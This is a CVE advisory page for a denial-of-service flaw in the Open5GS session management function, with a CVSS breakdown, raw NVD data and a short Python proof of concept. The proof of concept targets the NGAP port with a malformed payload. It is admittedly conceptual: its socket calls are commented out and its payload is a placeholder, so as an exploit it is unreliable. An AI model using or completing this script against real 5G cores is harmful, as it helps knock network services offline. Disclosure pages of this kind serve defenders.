Security Vulnerability Report
CVE-2025-56568 CVSS 7.5 HIGH

CVE-2025-56568

Published: 2026-04-30 20:16:23
Last Modified: 2026-05-04 18:16:26

Description

Assertion failure vulnerability in the PCO (Protocol Configuration Options) parser in the SMF (Session Management Function) component of Open5GS before v2.7.5 allows remote attackers to cause denial of service via specially crafted NGAP messages containing malformed length fields in protocol configuration data.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Open5GS < 2.7.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# Conceptual PoC for CVE-2025-56568
# This script demonstrates the logic for sending a malformed NGAP message.
# Note: Real NGAP communication runs over SCTP and requires ASN.1 encoding.

TARGET_IP = "192.168.1.100"
TARGET_PORT = 38412  # Default SCTP port for NGAP

# Malformed payload: Simulating an NGAP message with a bad PCO length field.
# In a real scenario, this hex stream would be a valid NGAP PDU structure
# with specific length corruptions in the PCO container.
malformed_payload = b"\x00\x0f\x40\x00\x00\x00\x02\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x01"


def send_exploit():
    print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...")
    # Since NGAP uses SCTP, standard TCP/UDP sockets won't work directly.
    # This is a placeholder for the transport mechanism.
    try:
        # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # sock.connect((TARGET_IP, TARGET_PORT))
        # sock.send(malformed_payload)
        print("[!] Payload sent (Simulated). Check target for crash.")
        # sock.close()
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    send_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56568", "sourceIdentifier": "[email protected]", "published": "2026-04-30T20:16:23.220", "lastModified": "2026-05-04T18:16:25.527", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Assertion failure vulnerability in the PCO (Protocol Configuration Options) parser in the SMF (Session Management Function) component of Open5GS before v2.7.5 allows remote attackers to cause denial of service via specially crafted NGAP messages containing malformed length fields in protocol configuration data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "references": [{"url": "https://github.com/open5gs/open5gs/commit/d7707879c943d2c952235382154d835b5849d54e", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/issues/3969", "source": "[email protected]"}]}}